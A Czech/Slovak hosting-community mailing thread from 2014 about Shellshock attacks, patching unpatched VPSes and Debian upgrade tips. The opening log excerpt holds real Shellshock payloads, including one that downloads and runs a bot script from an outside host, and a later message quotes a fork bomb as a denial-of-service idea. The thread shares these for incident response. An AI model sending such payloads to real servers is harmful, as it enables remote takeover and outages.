/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log.1:209.126.230.72 - - [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32
+0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" /var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34 +0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a" /var/log/nginx/access.log.1:137.189.52.234 - - [27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
vyzera to trochu zle :-/ ... co odporucate s tym robit? killnut len podozrive procesy? a pohladat nejake stopy po tom, ci sa nezapinaju po restarte?
2014-09-29 10:10 GMT+02:00 Michal Miklos <mimik@mimik.sk mailto:mimik@mimik.sk>:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář <janbivoj.kolar@zazen-nudu.cz mailto:janbivoj.kolar@zazen-nudu.cz> wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik
byl úspěšný či nikoliv?
Honza
On 29.9.2014 10 tel:29.9.2014%2010:02, Petr Krcmar wrote:
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz
mailto:Community-list@lists.vpsfree.cz
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz mailto:Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Ahojte,
Predpokladam, ak ma status = 200, tak to asi preslo ..... Ja mam vsade 404 .....
S pozdravom ostava
Michal Kovarčík CEO, co-owner phone no.: +421 905 232 652 e-mail: michal.kovarcik@mloks.com linkedin: http://www.linkedin.com/pub/michal-kovarcik/21/840/408
-----Original Message----- From: community-list-bounces@lists.vpsfree.cz [mailto:community-list-bounces@lists.vpsfree.cz] On Behalf Of "Jan B. Kolář" Sent: Monday, September 29, 2014 10:08 AM To: community-list@lists.vpsfree.cz Subject: Re: [vpsFree.cz: community-list] Útoky na bash běží
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote:
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Dne 29.9.2014 v 10:08 "Jan B. Kolář" napsal(a):
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš 404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál. Jestli byl útok úspěšný tam nevyčteš.
On Mon, 29 Sep 2014 10:12:51 +0200 Petr Krcmar petr.krcmar@vpsfree.cz wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář" napsal(a):
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš 404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál. Jestli byl útok úspěšný tam nevyčteš.
IMHO je logika zejména takováto:
a. Nenašel jsi záznam v logu -> útok byl úspěšný, b. Našel jsi záznam v logu -> nic nevíš.
To by chtělo monitorovat síťový provoz z nějakého externího, zaručeně nenapadnutého stroje. S tímhle by zrovna VPSfree mohl pomoci, ne?
Petr T
Dne 29.9.2014 v 10:31 Petr Tesařík napsal(a):
To by chtělo monitorovat síťový provoz z nějakého externího, zaručeně nenapadnutého stroje. S tímhle by zrovna VPSfree mohl pomoci, ne?
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
Petr Krcmar wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
Zajímalo by mě, kolik z těch "nezáplatovaných" VPS bylo skutečně _zranitelných_. Ono je jedna věc zkusit někam zachrootovat a zkusit binárku (nebo jak jste to testovali), ale druhá věc je, jestli na tom serveru běží nějaké služby, přes které se ta chyba opravdu dá zneužít.
Dne 29.9.2014 v 13:42 Jirka Bourek napsal(a):
Ono je jedna věc zkusit někam zachrootovat a zkusit binárku (nebo jak jste to testovali), ale druhá věc je, jestli na tom serveru běží nějaké služby, přes které se ta chyba opravdu dá zneužít.
Zkoušeli jsme samozřejmě tu binárku. Prověřovat každý server zvlášť a koukat do konfigurace je šílený úkol. Bohatě stačí, když začnou lidi aktualizovat systém.
je uplne jedno jestli na danem serveru to lze zneuzit nebo ne. jde o to ze je to signal toho ze admin je ignorant a kasle na bezpecnostni aktualizace. a takovahle chyba bashe lze zneuzit nejen primo prez cgi, ale napriklad kombinaci s jinou chybou (ruzne formy injectingu v interpretovanych jazycich, atd...). takze rict ze nejakej server jenom proto ze nema pustenej apache neni zneuzitelnej proste nejde...
29. září 2014 13:42:37 CEST, Jirka Bourek trekker.dk@abclinuxu.cz napsal:
Petr Krcmar wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a
zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě
nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
Zajímalo by mě, kolik z těch "nezáplatovaných" VPS bylo skutečně _zranitelných_. Ono je jedna věc zkusit někam zachrootovat a zkusit binárku (nebo jak jste to testovali), ale druhá věc je, jestli na tom serveru běží nějaké služby, přes které se ta chyba opravdu dá zneužít. _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Inak, napadlo mi, ze webka beziaca na plain CGI s neupdatnutym Bashom sa vlastne da velmi jednoducho "DoS-ovat" z jedineho pocitaca s jedinym requestom. Staci ako user-agenta poslat fork-bomb :)
:(){ :|:& };:
V pripade vpsFree by toto bol celkom pruser, nakolko by to asi polozilo nielen danu VPS, ale zrejme celu masinu.
On 29 Sep 2014, at 14:21, Stanislav Petr glux@glux.org wrote:
je uplne jedno jestli na danem serveru to lze zneuzit nebo ne. jde o to ze je to signal toho ze admin je ignorant a kasle na bezpecnostni aktualizace. a takovahle chyba bashe lze zneuzit nejen primo prez cgi, ale napriklad kombinaci s jinou chybou (ruzne formy injectingu v interpretovanych jazycich, atd...). takze rict ze nejakej server jenom proto ze nema pustenej apache neni zneuzitelnej proste nejde...
- září 2014 13:42:37 CEST, Jirka Bourek <trekker.dk http://trekker.dk/@abclinuxu.cz> napsal:
Petr Krcmar wrote: Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a): V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
Zajímalo by mě, kolik z těch "nezáplatovaných" VPS bylo skutečně _zranitelných_. Ono je jedna věc zkusit někam zachrootovat a zkusit binárku (nebo jak js te to testovali), ale druhá věc je, jestli na tom serveru běží nějaké služby, přes které se ta chyba opravdu dá zneužít.
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list http://lists.vpsfree.cz/listinfo/community-list
-- Odesláno z mého telefonu s Androidem pomocí pošty K-9 Mail. Omluvte prosím moji stručnost. _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
nepolozilo. tohle polozi server jen nekomu kdo nepouziva limitace zdroju... viz man limits.conf - ze jste cetl tu blbost o fork bombach na zive.cz?
30. září 2014 17:23:27 CEST, "Ján Raška" raskaj@gmail.com napsal:
Inak, napadlo mi, ze webka beziaca na plain CGI s neupdatnutym Bashom sa vlastne da velmi jednoducho "DoS-ovat" z jedineho pocitaca s jedinym requestom. Staci ako user-agenta poslat fork-bomb :)
:(){ :|:& };:
V pripade vpsFree by toto bol celkom pruser, nakolko by to asi polozilo nielen danu VPS, ale zrejme celu masinu.
On 29 Sep 2014, at 14:21, Stanislav Petr glux@glux.org wrote:
je uplne jedno jestli na danem serveru to lze zneuzit nebo ne. jde o
to ze je to signal toho ze admin je ignorant a kasle na bezpecnostni aktualizace. a takovahle chyba bashe lze zneuzit nejen primo prez cgi, ale napriklad kombinaci s jinou chybou (ruzne formy injectingu v interpretovanych jazycich, atd...). takze rict ze nejakej server jenom proto ze nema pustenej apache neni zneuzitelnej proste nejde...
- září 2014 13:42:37 CEST, Jirka Bourek <trekker.dk
http://trekker.dk/@abclinuxu.cz> napsal:
Petr Krcmar wrote: Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a): V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a
zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě
nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
Zajímalo by mě, kolik z těch "nezáplatovaných" VPS bylo skutečně _zranitelných_. Ono je jedna věc zkusit někam zachrootovat a zkusit binárku (nebo jak js te to testovali), ale druhá věc je, jestli na tom serveru běží nějaké služby, přes které se ta chyba opravdu dá
zneužít.
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
http://lists.vpsfree.cz/listinfo/community-list
-- Odesláno z mého telefonu s Androidem pomocí pošty K-9 Mail. Omluvte
prosím moji stručnost.
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky: https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar petr.krcmar@vpsfree.cz wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
-- Petr Krčmář vpsFree.cz _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Dne 29.9.2014 v 13:57 Nikos Timiopulos napsal(a):
debian squeeze ale bez LTS repozitárů,
Je to tak, pro Wheezy je nutné mít zapnutý repozitář security, Squeeze je podporován už jen v repozitáři squeeze-lts a pokud máte ještě někde Sarge a Etch (což vřele nedoporučuji), musíte si Přidat speciální repo na linux.it, kde ta oprava je:
http://ftp.linux.it/pub/People/md/bash/
Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz je vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos nikos@manikstudio.cz:
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky: https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar petr.krcmar@vpsfree.cz wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
-- Petr Krčmář vpsFree.cz _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Byl jsem na tom podobně. Pořád jsem zkoušel aktualizovat a nic. Pak jsem zjistil, že jsem neměl přidaný LTS repozitář. :)
Dne 29. září 2014 14:16 Juraj Chlebec havran@gmail.com napsal(a):
Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz je vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos nikos@manikstudio.cz:
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky: https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar petr.krcmar@vpsfree.cz wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
-- Petr Krčmář vpsFree.cz _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-- Juraj Chlebec aka Havran http://www.svoji.sk
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Chystam sa robit dist upgrade z wheezy na squeeze. Ma s tym niekto prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo nie, ale ak mate niekto prakticku skusenost a riesili ste aj nejaky problem, urcite pomozete :)
Dik. Miso
Dňa pondelok, 29. septembra 2014 Jiří Čermák jirka.cer@gmail.com napísal(a):
Byl jsem na tom podobně. Pořád jsem zkoušel aktualizovat a nic. Pak jsem zjistil, že jsem neměl přidaný LTS repozitář. :)
Dne 29. září 2014 14:16 Juraj Chlebec <havran@gmail.com javascript:_e(%7B%7D,'cvml','havran@gmail.com');> napsal(a):
Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz je vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos <nikos@manikstudio.cz javascript:_e(%7B%7D,'cvml','nikos@manikstudio.cz');>:
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky: https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar <petr.krcmar@vpsfree.cz javascript:_e(%7B%7D,'cvml','petr.krcmar@vpsfree.cz');> wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
-- Petr Krčmář vpsFree.cz _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz'); http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz'); http://lists.vpsfree.cz/listinfo/community-list
-- Juraj Chlebec aka Havran http://www.svoji.sk
Community-list mailing list Community-list@lists.vpsfree.cz javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz'); http://lists.vpsfree.cz/listinfo/community-list
Teda.. Aby som doplnil - tusim som poplietol tie edicie... Tak radsej ciselne - upgrade z 6.0 na 7.0 :)
Dňa pondelok, 29. septembra 2014 Michal Dobsovic dobsovic@itlearning.sk napísal(a):
Chystam sa robit dist upgrade z wheezy na squeeze. Ma s tym niekto prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo nie, ale ak mate niekto prakticku skusenost a riesili ste aj nejaky problem, urcite pomozete :)
Dik. Miso
Dňa pondelok, 29. septembra 2014 Jiří Čermák <jirka.cer@gmail.com javascript:_e(%7B%7D,'cvml','jirka.cer@gmail.com');> napísal(a):
Byl jsem na tom podobně. Pořád jsem zkoušel aktualizovat a nic. Pak jsem zjistil, že jsem neměl přidaný LTS repozitář. :)
Dne 29. září 2014 14:16 Juraj Chlebec havran@gmail.com napsal(a):
Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz je vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos nikos@manikstudio.cz:
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky: https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar petr.krcmar@vpsfree.cz wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
-- Petr Krčmář vpsFree.cz _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-- Juraj Chlebec aka Havran http://www.svoji.sk
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Michal Dobsovic wrote:
Chystam sa robit dist upgrade z wheezy na squeeze. Ma s tym niekto prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo nie, ale ak mate niekto prakticku skusenost a riesili ste aj nejaky problem, urcite pomozete :)
Tahle narychlo z hlavy mě napadá, že ve squeeze je /etc/mtab symlink na /proc/mounts. Samo se to při upgrade nezmění, ale když to uděláte ručně, tak df a spol vypisuje spoustu věcí, které v /proc/mounts jsou ale v mtab nebyly. Bind mounty a tak.
Výpisy "df" a "mount" jsou pak vcelku nepřehledný a chybí v nich nějaké informace.
Neni to opacne btw?
Jinak jsem mel akorat problem s postfix+maildrop+mysql, kde jsem musel upravit nejake cesty kvuli chrootu. Jinak zadny problem nebyl.
Jarda
------ Original Message ------ From: "Michal Dobsovic" dobsovic@itlearning.sk To: "vpsFree.cz Community list" community-list@lists.vpsfree.cz Sent: 9/29/2014 11:20:57 PM Subject: Re: [vpsFree.cz: community-list] Útoky na bash běží
Chystam sa robit dist upgrade z wheezy na squeeze. Ma s tym niekto prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo nie, ale ak mate niekto prakticku skusenost a riesili ste aj nejaky problem, urcite pomozete :)
Dik. Miso
Dňa pondelok, 29. septembra 2014 Jiří Čermák jirka.cer@gmail.com napísal(a):
Byl jsem na tom podobně. Pořád jsem zkoušel aktualizovat a nic. Pak jsem zjistil, že jsem neměl přidaný LTS repozitář. :)
Dne 29. září 2014 14:16 Juraj Chlebec javascript:_e(%7B%7D,'cvml','havran@gmail.com'); napsal(a):
Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz je vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos javascript:_e(%7B%7D,'cvml','nikos@manikstudio.cz');:
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky: https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar javascript:_e(%7B%7D,'cvml','petr.krcmar@vpsfree.cz'); wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
-- Petr Krčmář vpsFree.cz _______________________________________________ Community-list mailing list javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz'); http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz'); http://lists.vpsfree.cz/listinfo/community-list
-- Juraj Chlebec aka Havran http://www.svoji.sk
Community-list mailing list javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz'); http://lists.vpsfree.cz/listinfo/community-list
Doporučuju si na to vytvořit VPS na playgroundu, odladit a pak přehodit. Pokud používáš mysql, apache apod. z balíčků squeeze, je vhodné se podívat na dokumentaci migrace jednotlivých verzí - např. u mysql doporučují nejprve vytvořit zálohu a tu následně obnovit už v nové verzi mysql (http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html).
Třeba ještě pomůžou moje ne moc pohledné noob poznámky s postupem, které jsem během upgradu sepsal. Nejprve jsou vypsány configy balíčků, kterých se upgrade týkal a dával na výběr, zda ponechat současný config, nebo nahradit novým. To bude samozřejmě individuální, nicméně v mém případě byl problém akorát s mysql:
/etc/crontab /etc/default/rkhunter /etc/fail2ban/jail.conf /etc/sudoers * /etc/mysql/my.cnf /etc/php5/cli/php.ini /etc/php5/cgi/php.ini /etc/default/saslauthd /etc/apache2/mods-available/ssl.conf /etc/apache2/apache2.conf /etc/apache2/mods-available/php5.conf /etc/php5/apache2/php.ini
mysql: http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html mysqldump -u root -p --all-databases > backup.sql mysql -u root -p < backup.sql
0) apt-get remove --purge dovecot-common 1) apt-get update & upgrade & dist-upgrade of current distribution 2) dpgk --audit 3) mysql dump 4) edit sources.list squeeze -> wheezy 5) apt-get update & upgrade & dist-upgrade (keep current configs) 6) NOW - problem with mysql, replace old my.cnf with new my.cnf.dpkg-dist 7) apt-get autoremove 8) dpkg --audit , aptitude reinstall ****** all the packages listed in dpkg --audit 9) create /etc/my.cnf with:
[mysqld] open_files_limit = 100000
9) mysql from dump (recommended by mysql) 10) apt-get install dovecot-common dovecot-imapd dovecot-pop3d
On 29 Sep 2014, at 23:20, Michal Dobsovic dobsovic@itlearning.sk wrote:
Chystam sa robit dist upgrade z wheezy na squeeze. Ma s tym niekto prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo nie, ale ak mate niekto prakticku skusenost a riesili ste aj nejaky problem, urcite pomozete :)
Dik. Miso
Dňa pondelok, 29. septembra 2014 Jiří Čermák jirka.cer@gmail.com napísal(a): Byl jsem na tom podobně. Pořád jsem zkoušel aktualizovat a nic. Pak jsem zjistil, že jsem neměl přidaný LTS repozitář. :)
Dne 29. září 2014 14:16 Juraj Chlebec havran@gmail.com napsal(a): Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz je vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos nikos@manikstudio.cz: Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky: https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar petr.krcmar@vpsfree.cz wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
-- Petr Krčmář vpsFree.cz _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-- Juraj Chlebec aka Havran http://www.svoji.sk
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Co sa tyka mysql, vrele odporucam prechod na mariaDB. Bezi uplne bez problemov ako nahrada za mysql a da sa tam dost dobre riesit HA cez Galera cluster.
Ja som mal jeden problem, a sice, ze aj ked som mal apache2 odinstalovany (pouzivam nginx + java) tak mi ho tam automaticky nainstalovalo (zrejme to je nejaky default balik alebo bol ako dependency niecoho) a kedze startoval skor nez nginx, tak si chytil port 80 a tym padom nginx nenastartoval, musel som to riesit rucne a ten apache vypnut, zmazat a nastartovat nginx.
Taktiez, co sa tyka javy, ak pouzivate javu od Oraclu (nie OpenJDK) tak akykolvek upgrade (nielen dist-upgrade ale akykolvek upgrade balika javy) prepise subory security extensions naspat na defaultne, cize tym padom po upgrade je potrebny rucny zasah, inak nebude mozne pouzit v sifrovacich algoritmoch lepsie nez 128bitove kluce.
Ak nie je mozne pouzit prehodenie z playgroundu, urcite odporucam si to na playgrounde minimalne vopred odskusat, takto som o problemoch s apachom ci s javou vedel dopredu a pripravil som si script, ktory som po dokonceni upgradu spusitl a ten mi pofixoval vsetko ostatne, takze som uz nad tym nematuroval a downtime bol naozaj minimalny :)
On 30 Sep 2014, at 00:30, Nikos Timiopulos nikos@manikstudio.cz wrote:
Doporučuju si na to vytvořit VPS na playgroundu, odladit a pak přehodit. Pokud používáš mysql, apache apod. z balíčků squeeze, je vhodné se podívat na dokumentaci migrace jednotlivých verzí - např. u mysql doporučují nejprve vytvořit zálohu a tu následně obnovit už v nové verzi mysql (http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html).
Třeba ještě pomůžou moje ne moc pohledné noob poznámky s postupem, které jsem během upgradu sepsal. Nejprve jsou vypsány configy balíčků, kterých se upgrade týkal a dával na výběr, zda ponechat současný config, nebo nahradit novým. To bude samozřejmě individuální, nicméně v mém případě byl problém akorát s mysql:
/etc/crontab /etc/default/rkhunter /etc/fail2ban/jail.conf /etc/sudoers
- /etc/mysql/my.cnf
/etc/php5/cli/php.ini /etc/php5/cgi/php.ini /etc/default/saslauthd /etc/apache2/mods-available/ssl.conf /etc/apache2/apache2.conf /etc/apache2/mods-available/php5.conf /etc/php5/apache2/php.ini
